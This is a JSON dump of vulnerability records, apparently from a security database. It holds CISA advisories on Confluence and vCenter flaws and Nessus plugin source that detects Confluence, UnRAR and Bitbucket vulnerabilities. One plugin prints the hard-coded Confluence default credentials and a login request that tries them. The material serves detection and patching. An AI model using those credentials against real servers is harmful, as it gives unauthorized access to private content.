"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-24T00:00:00", "id": "CISA:D9F4EE6727B9BF3A40025E9D70945311", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-01T13:56:33", "description": "Atlassian has released new Confluence Server and Data Center versions to address [remote code execution vulnerability CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>) affecting these products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. 
Atlassian reports that there is known exploitation of this vulnerability.\n\nCISA strongly urges organizations to review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) and upgrade Confluence Server and Confluence Data Center.\n\n**Note:** per [BOD 22-01 Catalog of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>), federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products AND either apply the software update to all affected instances OR remove the affected products by 5 pm ET on Monday, June 6, 2022.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "cisa", "title": "Atlassian Releases New Versions of Confluence Server and Data Center to Address CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-30T00:00:00", "id": "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T14:02:20", "description": "CISA has added one new vulnerability\u2014[CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>)\u2014to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow of the \"Date Added to Catalog\" column, which will sort by descending dates. \n\nThere are currently no updates available. Atlassian is working to issue an update. Per BOD 22-01 Catalog of Known Exploited Vulnerabilities, federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products until an update is available and successfully applied.\n\n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. 
BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information. \n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog\u202f\u202f ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-17T16:33:16", "description": "The version of Atlassian Confluence installed on the remote host is prior to < 7.4.17 / 7.13.x < 7.13.6 / 7.14.x < 7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2. It is potentially affected by a hard-coded credential vulnerability if the 'Questions for Confluence' app is installed.\n\nThe Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.(CVE-2022-26138)\n\nNote that Nessus has not tested for this issue but has instead relied only on Confluence's self-reported version number. 
This plugin will only run in 'Paranoid' scans.", "cvss3": {}, "published": "2022-07-21T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 7.4.17 / 7.13.x < 7.13.6 / < 7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2 (CONFSERVER-79483)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-12-08T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CONFSERVER-79483.NASL", "href": "https://www.tenable.com/plugins/nessus/163327", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163327);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/08\");\n\n script_cve_id(\"CVE-2022-26138\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/19\");\n\n script_name(english:\"Atlassian Confluence < 7.4.17 / 7.13.x < 7.13.6 / < 7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2 (CONFSERVER-79483)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Atlassian Confluence host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Confluence installed on the remote host is prior to < 7.4.17 / 7.13.x < 7.13.6 / 7.14.x <\n7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2. It is potentially affected by a hard-coded credential\nvulnerability if the 'Questions for Confluence' app is installed.\n\nThe Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in\nthe confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated\nattacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content\naccessible to users in the confluence-users group. 
This user account is created when installing versions 2.7.34, 2.7.35,\nand 3.0.2 of the app.(CVE-2022-26138)\n\nNote that Nessus has not tested for this issue but has instead relied only on Confluence's self-reported version\nnumber. This plugin will only run in 'Parnoid' scans.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-79483\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 7.4.17, 7.13.6, 7.14.3, 7.15.2, 7.16.4, 7.17.2, 7.13.6, 7.14.3, 7.15.2, 7.16.4,\n7.17.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26138\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'confluence', port:port, webapp:true);\n\n# The vuln is in the Questions for Confluence app, not Confluence itself\n# We cannot determin if this is installed and/or the offending user account is present\nif (report_paranoia < 2) audit(AUDIT_POTENTIAL_VULN, 'Confluence', app_info.version);\n\nvar constraints = [\n { 'fixed_version' : '7.4.17', 'fixed_display' : '7.4.17 / 7.13.6 / 7.14.3 / 7.15.2 / 7.16.4 / 7.17.2' },\n { 'min_version' : '7.13.0', 'fixed_version' : '7.13.6' },\n { 'min_version' : '7.14.0', 'fixed_version' : '7.14.3' },\n { 'min_version' : '7.15.0', 'fixed_version' : '7.15.2' },\n { 'min_version' : '7.16.0', 'fixed_version' : '7.16.4' },\n { 'min_version' : '7.17.0', 'fixed_version' : '7.17.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:33:27", "description": "The remote confluence web application uses a known set of hard-coded default credentials of the 'Questions for Confluence' marketplace application. 
An attacker can exploit this to gain administrative access to the remote host.", "cvss3": {}, "published": "2022-08-12T00:00:00", "type": "nessus", "title": "Questions for Confluence App Default Credentials (CVE-2022-26138)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2022-26138.NASL", "href": "https://www.tenable.com/plugins/nessus/164091", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164091);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2022-26138\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/19\");\n\n script_name(english:\"Questions for Confluence App Default Credentials (CVE-2022-26138)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The application hosted on the remote web server uses a default set of known credentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote confluence web application uses a known set of hard-coded default credentials of the\n'Questions for Confluence' marketplace application. 
An attacker can exploit this to gain \nadministrative access to the remote host.\");\n # https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56edf34e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the application's default credentials.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26138\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('url_func.inc');\ninclude('vcf.inc');\ninclude('debug.inc');\n\nvar app_name = 'confluence';\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\nvar url = build_url(port:port, qs:app_info['path']);\n\n##\n# Try to authenticate with default disabledsystemuser/disabled1system1user6708 creds\n#\n# @param port - the port the application exists on\n# @return TRUE for successful authentication, otherwise FALSE\n##\nfunction try_default_creds(port)\n{\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'[trying default creds]');\n var res, post;\n post = 'os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Findex.action';\n # Authenticate\n res = http_send_recv3(\n port : port,\n method : 'POST',\n item : '/dologin.action',\n data : post,\n content_type : \"application/x-www-form-urlencoded\",\n exit_on_fail : TRUE\n );\n\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'Attempted to login with: ' + http_last_sent_request());\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'Response was: ' + obj_rep(res));\n if ('HTTP/1.1 302' >< res[0] && 'X-Seraph-LoginReason: OK' >< res[1])\n {\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'[login confirmed][ ' + res[0] + '][' + res[1] + ']');\n return TRUE;\n }\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'[login failed][ ' + res[0] + '][' + res[1] + ']');\n return FALSE;\n}\n\nvar can_auth = try_default_creds(port:port);\n\nvar report = NULL;\nif (can_auth)\n{\n report = 'Nessus was able to gain access to the remote confluence app\\n' +\n 'using the following set of credentials:\\n' +\n '\\n Username : disabledsystemuser' +\n '\\n Password : disabled1system1user6708';\n\n 
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, url);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:30:13", "description": "The remote SUSE Linux SLES12 host has packages installed that are affected by a vulnerability as referenced in the SUSE- SU-2022:1760-1 advisory.\n\n - RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected. (CVE-2022-30333)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-05-20T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : unrar (SUSE-SU-2022:1760-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30333"], "modified": "2023-03-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libunrar-devel", "p-cpe:/a:novell:suse_linux:libunrar5_6_1", "p-cpe:/a:novell:suse_linux:unrar", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2022-1760-1.NASL", "href": "https://www.tenable.com/plugins/nessus/161392", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2022:1760-1. 
The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161392);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/10\");\n\n script_cve_id(\"CVE-2022-30333\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2022:1760-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n\n script_name(english:\"SUSE SLES12 Security Update : unrar (SUSE-SU-2022:1760-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES12 host has packages installed that are affected by a vulnerability as referenced in the SUSE-\nSU-2022:1760-1 advisory.\n\n - RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract\n (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and\n Android RAR are unaffected. 
(CVE-2022-30333)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1199349\");\n # https://lists.suse.com/pipermail/sle-security-updates/2022-May/011102.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?418ef299\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-30333\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libunrar-devel, libunrar5_6_1 and / or unrar packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30333\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'UnRAR Path Traversal in Zimbra (CVE-2022-30333)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libunrar-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libunrar5_6_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:unrar\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES12', 'SUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(5)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES12 SP5\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'libunrar-devel-5.6.1-4.8.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5', 'sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'libunrar5_6_1-5.6.1-4.8.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5', 'sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'unrar-5.6.1-4.8.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5', 'sles-release-12.5']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, 
tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libunrar-devel / libunrar5_6_1 / unrar');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-06T12:42:21", "description": "The version of Atlassian Bitbucket installed on the remote host 7.0.0 prior to 7.6.17, 7.7.0 prior to 7.17.10, 7.18.0 prior to 7.21.4, 8.0 prior to 8.0.3, 8.1 prior to 8.1.3, 8.2 prior to 8.2.2 or 8.3 prior to 8.3.1. It is, therefore, affected by a remote code execution vulnerability. A remote attacker with read permissions to a public or private Bitbucket repository can send a malicious HTTP request leading to arbitrary code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-09-07T00:00:00", "type": "nessus", "title": "Atlassian Bitbucket < 7.6.17 / 7.17.10 / 7.21.4 / 8.0.4 / 8.1.3 / 8.2.2 / 8.3.1 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2023-01-26T00:00:00", "cpe": ["cpe:/a:atlassian:bitbucket"], "id": "BITBUCKET_8_3_1.NASL", "href": "https://www.tenable.com/plugins/nessus/164810", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164810);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/26\");\n\n script_cve_id(\"CVE-2022-36804\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/21\");\n\n script_name(english:\"Atlassian Bitbucket < 7.6.17 / 7.17.10 / 7.21.4 / 8.0.4 / 8.1.3 / 8.2.2 / 8.3.1 RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Bitbucket installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Bitbucket installed on the remote host 7.0.0 prior to 7.6.17, 7.7.0 prior to 7.17.10, 7.18.0\nprior 
to 7.21.4, 8.0 prior to 8.0.3, 8.1 prior to 8.1.3, 8.2 prior to 8.2.2 or 8.3 prior to 8.3.1. It is, therefore,\naffected by a remote code execution vulnerability. A remote attacker with read permissions to a public or private\nBitbucket repository can send a malicious HTTP request leading to arbitrary code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/BSERV-13438\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.3, 8.2.2, 8.3.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-36804\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Bitbucket Git Command Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/07\");\n\n script_set_attribute(attribute:\"plugin_type\", 